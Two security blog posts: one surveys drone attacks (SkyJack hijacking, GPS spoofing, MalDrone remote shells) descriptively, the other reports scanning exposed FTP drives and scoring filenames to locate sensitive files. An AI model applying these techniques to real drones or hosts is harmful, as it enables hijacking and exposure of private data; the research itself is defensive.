Drone Insecurities

Airborne cyber attacks against drones have been conducted by hackers, criminals and state-sponsored actors. Unmanned Aerial Vehicles (UAVs) – also known as “drones” – are gaining popularity in many sectors of society. Pioneered by the military, law enforcement as well as criminals have used them. Hobbyists gather to race while retail stores will soon ship purchases with these. To reach the market quickly, security is often an afterthought. Vendors and operators underestimate the intent and capability of hackers to target their products. Thus researchers took up the challenge of showing their vulnerabilities. Reviewing current security issues and past incidents highlight the issues and their solutions before critical failures in drones causes harm. However before doing so, let’s quickly study the basic inner workings of drones.

Drones: How do they work?

Drones range from the highly complex multi-million dollars military aircraft to the toy models available for a hundred dollars. Despite this disparity, their overall architecture can be divided into 1) the aircraft and 2) the ground station. The aircraft regroups sensors and controllers needed to fly while the ground station includes software and hardware to send commands wirelessly. The ground station includes wireless transceivers, flight planning software, aircraft maintenance applications and the operators. The aircraft hosts the flight controller which processes data from sensors, avionics, communications, autopilot systems and in some cases, weapons.

Drone System Diagram
Drone Command and Control Diagram

Operators send navigation commands via a Remote Controller (RC), which relay information via a Line-of-Sight (LOS) communication channel. In low-end drones, standard wireless networking protocols are used while higher-end ones leverage satellite communications. Data from the ground station is transmitted to receivers or the aircraft and processed by the flight controller. The controller manages the outputs from various sensors including the GPS receiver, camera and propellers. Audiovisual data is relayed to the ground station via a second communication channel or stored on removable medias. Predefined routes can be programmed using flight planning software to make the aircraft autonomous.

Cyberattacks against Drones

Communication channels are the obvious attack vector. Unfortunately calls for encryption are often downplayed and proprietary protocols, despite some may believe, are not safe from reverse engineering and hijacking. In 2009, Iraqi militants found out that unencrypted videos feed from U.S. drones were available by pointing a satellite receiver towards the drone, greatly compromising operational effectiveness. While secure channels are critical, weak encryption is as good as no encryption. It was discovered in 2015 that scrambled video feeds between Israeli UAVs and ground stations were easily decrypted using open-source software. An attacker only required knowledge of the proper frequencies. That being said, even good encryption is no  remedy when employed with vulnerable key management systems. A fact rarely discussed by security vendors pitching solutions.

Lower end drones have been hacked via known vulnerabilities in wireless networking protocols. SkyJack is an air-to-air network attack drone that detects surrounding wireless connections of vulnerable drones and reroutes them to itself, allowing the remote operator to to hijack the target. This deauthentification technique used is similar to the one seen against home wireless networks. Other attacks included cracking WEP networks between the flight planning software and the remote controller, allowing the intruder to issue commands to the remote controller.

Communicational channels are not the only weak points. Drones require information from their environment in order to navigate. The information is captured by the sensors and transmitted to the flight controller for processing. Therefore providing invalid inputs to the sensors will disrupt the aircraft. Invalid GPS data is one of the explanation for the unexpected landing of a U.S. RQ-170 sentinel in Iran. The Iranian military maintain they spoofed GPS data by broadcasting stronger signals than the ones from valid GPS satellites. By doing so they forced the sentinel to land. Such an attack was proven possible on other models. The second theory is that an internal malfunction forced an emergency landing. In either case, this incident highlighted two issues: implicit trust of sensory data sources and unexpected effects of internal errors.

Security is not only about networks; it’s also about robustness of the internal software. MalDrone is a malware compiled for ARM Linux which allows to spawn a remote shell on the target drone. The attacker intercepts an unencrypted channel between the ground station and a vulnerable aircraft to upload the malware, allowing direct access to the operating system (OS). An alternative tactic could aim to modify the firmware of the flight controller or sensors. Users rarely validate the integrity of the firmware downloaded online, allowing backdoors to be injected via man-in-the-middle attacks. Hackers may leverage social engineering to send malicious updates or exploit a vulnerability to execute arbitrary code and gain remote access to the drone. Like many Internet-of-Things (IoT) devices, drones are seldom updated by their owners and could remain vulnerable for a long period of time.

Conclusion

As drones continue to find increased usage in civil society, they will be subjected to further analysis. Engineers and operators should never underestimate both the capability and intent of malicious actors to target their product either for fun, profit or other malicious goals. Lessons learned by the software industry remain mostly unimplemented:; lack of secure communications, no firmware integrity validation, loose or absent security controls and slow patching of critical vulnerabilities. The success of the Mirai botnet is a result of these failings and drones are not exempt. Unlike the distributed denial of service observed, compromised drones may raise safety concerns and must therefore be secured.

#TheGreatFTPHunt – 2% to 9% of files scanned potentially containing confidential information

In this post, we continue our data collection and evaluation of files stored on removable medias publicly accessible to the Internet. The collection of filenames from 6,500 hosts is ongoing, therefore we’re going to focus on evaluation of sensitivity of a file based only on its filename. We also present the latest statistics collected in our database.

Introduction

In this post, we continue our data collection and evaluation of files stored on removable medias publicly accessible to the Internet. The collection of filenames from 6,500 hosts is ongoing, therefore we’re going to focus on evaluation of sensitivity of a file based only on its filename. Based on the current result, 2 to 9% of the 3000 files reviewed were sensitive or potentially sensitive. Most of the sensitive files are concentrated on a few hosts. These files often include financial information or project data from businesses. So far, 773 hosts containing around 4.5 million files have been scanned.

Discussion

The amount of filenames collected is quite large and we cannot evaluate manually each filename for its probable sensitivity. As such, we need to devise a procedure to automatically assess its sensitivity. We have some definitions and restrictions to list first to clarify what a sensitive file is and limitation to our evaluation criteria.

In this document, sensitive file refers to user-generated or software-generated files based on user input that contains information that should probably not be publicly accessible and which can be leveraged against an individual or organization. This includes:

  • Personal identification documents; passport, driver’s license, visas, government forms…
  • Personal finance documents; income tax files, insurance forms, credit card statements, mortgage, pay stubs, banking information
  • Personal medical documents; prescriptions, medical records
  • Work-related files; emails, proprietary source code, password lists
  • Business finances; customer lists, sales data, project costs, business deals, investments, payrolls
  • Intellectual property; blueprints, schema, patents, research
  • Network configuration; passwords files, configurations files, network diagrams, user databases
  • Large databases of emails, addresses and other personal information.

Some of the files not included in our analysis that includes;

  • Copyrighted / Illegally downloaded files. However we considered text file containing licensing keys to be sensitive.
  • Inappropriate contents (nude selfies, personal politics, group affiliations etc…)
  • Personal pictures, letters.
  • Addresses and emails were not considered personal, however databases of addresses and emails are considered sensitive

Because of the volume, we cannot download and manually verify each file to confirm its contents, as such our main restriction is that our assessment must be done solely based on the absolute filename recorded. As such, to evaluate the sensitivity, we used three categories; positive, negative and neutral, i.e. either a file is very likely to sensitive, potentially sensitive or clearly not sensitive at all. Of course, there is always a possibility that a file labeled as sensitive may not be. For example, a file called social security numbers.xls may contain only formulas or an empty form. Ideally, files identified as positive or neutral should be manually vetted.

The procedure to automatically assess the sensitivity of a file based on its path and name is first done by assessing a random sample manually. Using the ORDER BY RANDOM (note: there will be a need to review if this function is truly random, which I doubt) function (performance is not an issue in this experiment) of the Postgresql database, multiple  random samples of 100 filenames are retrieved from the database. Each file is shown to the evaluator which based on the path, filename and extension assess the sensitivity of the file as ‘positive‘, ‘neutral‘, ‘negative‘. For each run, we log the count of hits for all categories.

Listing 1 : Example of a run in which a script asks an evaluator to assess the sensitivity of files based on its absolute path.

The evaluator is assessing the filename based on keywords that may indicate the contents of the file. As such, a file containing the word, or as we call it in this document, a token such as sales, passport or passwords will be assume to contain information about sales, a passport scan or a list of passwords. In many cases, the filename is too obscure, but the path and extension may indicate the contents of the file. For example, a path containing the tokens project, finances and a Microsoft Excel extension despite a filename of axe189212_c.xls will be considered as neutral, as the file may contents information about a project. Examples of both scenarios are shown in listings 2 and 3:

Listing 2 : Examples of files that were deemed ‘positive’ hits based on keywords in their absolute path.

Listing 3 : Examples of files that were deemed ‘neutral’ (or ‘unknown’) hits based on keywords in their absolute path.

Filenames in foreign languages are roughly translated using Google Translate, as such, many of them are labeled as unsure.

A Python script then divide the filename in tokens, and each token is stored in the database along with the number of times it was found in a positive, neutral and negative hit. Tokens are created slightly differently based if they are located in the path, the filename or in the extension. For the extension, a single token is created which contains the extension itself. If the file does not have an extension or is not an extension usually associated with known software, no token is created. For the filename, tokens are created by splitting each word using characters usually known to separate words such as the underscore, dash, period or spaces. Lastly, for the path, directories are used as token and unlike filenames, are not split further. An example of this process is shown in listing 4:

Listing 4 : Example of the tokenization of a filename.

Once the tokens are created, the script will either add the token in the database or update its count based on the evaluator choice. After each update, a score is given to the token, which is simply the ratio between positive hits and the total count of appearances: p / hits). Note that tokens are considered different depending their location in the filename. As such, a filename such as /My_Passport/backup/Outlook emails backup.pst, will generate 2 distinct ‘backup’  tokens; the one from the path and the one from the filename. We explain this decision in the next paragraphs.

Listing 5 : Scores of the tokens extracted from the file in listing 4.

By using this procedure, we believe that tokens appearing often in both positive and negative hits will cancel each other, while the tokens strongly associated with positive and negative hits will remain clearly divided. Some sort of mathematical should follow later one (I hope…need to review discrete maths I guess). Some preliminary results  appears to confirm this approach as valid. Extensions strongly associated with sensitive contains higher scores while media files have null scores.

However, there is a need to further refine this process by associating a value, or weight, to the location of the token. Tokens in the path are not as indicative of the sensitivity of the file as much as a token in the filename or extension. Even within the path, the highest level is generally less indicative than the lowest one, i.e. /documents/finances 2012/sales/company sales.xls. Therefore when assessing a new filename, we need to give a score to the path, the filename and the extension. For the path, we will get the score of each token and multiply it with a weight that correspond to its location in the structure. For token that are not found the default value of 0 will be given. Then we will take the average of all token for the score of the path. As for the filename, we will not consider the position. Finally the stored score of the extension will be retrieved from the database. If the extension is not found, then a score of 0 will be used. This will transform a filename into a set of three real values which we can range between 0 and 1. To determine the weights needed for each location, we will used a supervised neural network. More research will be conducted to determine how to use this approach.

Results

As of 16 July 2015, 4,568,738 files have been recorded from 773 hosts.

Country Hosts
United States 258
Russian Federation 91
Sweden 69
Canada 66
Ukraine 27
Norway 24
United Kingdom 24
Australia 19
Netherlands 18
Hong 18
Taiwan 16
Poland 15
Germany 11
Romania 11
Finland 10
Switzerland 8
Korea 8
Singapore 7
Czech Republic 7
Japan 6
Table 1. Location of the 773 hosts scanned as of 16 July 2015 order by country.

Mp3 and JPEG image files remains the most common. As such, we focus our statistics on document-type of files for a change, i.e. Office documents. Adobe PDF files and Microsoft Word documents are the most common file types based on our current data as shown in figure 1.

Most common file types scanned as of 16 July 2015 for office-related documents
Figure 1. Most common file types scanned as of 16 July 2015 for office-related documents

At the moment, around 3000 files have been assessed (30 runs of 100 samples). For each run, we recorded the number of positives, neutral and negative hits and found them overall constant at each run. (see figure 2) However more details about the RANDOM function is needed to insure the randomness of the sample. This part may need to be redone. So far, between 2% and 9% of files scanned are considered sensitive or potentially sensitive (see figure 3). However we need to consider the concentration of these files to put this information into perspective. The 278 files identified as sensitive or potentially sensitive were located on 59 hosts, with one host accounting for 101 of these file. This indicates that files of interests for an attacker are likely to be concentrated on a few hosts.

Chart of assessed sensitivity of randomly selected 30 samples of 100 filenames.
Figure 2. Assessed sensitivity of randomly selected 30 samples of 100 filenames.
Chart of percentage of files according to their sensitivity based on manual assessment of 3000 randomly selected files.
Figure 3. Percentage of files according to their sensitivity based on manual assessment of 3000 randomly selected files.

As for tokens, we will have to consider the entire collection of filenames in order to have sample from multiple sources, as such, we will pursue manually assessing samples of 100 filenames as more data is collected. After which we should have an excellent training set for the neural network. Some high-recurring and high-scoring tokens are shown in tables 2 and 3.

Token Hits Score
attach 7 0.9285714286
txn 7 0.9285714286
planning 6 0.9166666667
archived 6 1
recpt 6 0.9166666667
2010taxreturns 5 1
person~2 4 1
purchase 3 1
order 2 1
Паспорт 2 1
Table 2. Sample of high-scoring tokens sorted on the number of times observed.
Token Hits Score
jpg 938 0.013326226
mp3 460 0
music 448 0
seagate_backup_plus_drive 382 0.1452879581
asusware 348 0
pictures 309 0.0048543689
sda1 285 0.0649122807
bigdaddy 279 0
elements 278 0.0485611511
transcend 247 0.0222672065
my_book 234 0.0106837607
Table 3. Sample of high-recurring tokens sorted on the number of times observed.

Conclusion

While these results are preliminary, they nevertheless seems to provide a solid indication of what one can find on publicly-available removable drives. Additional work and fine tuning of both code and processes is required to provide more accurate data and the next step while the scan is still on going it to develop a methodology to assess the sensitivity of all files, likely using a neural network for classification based on the method presented above.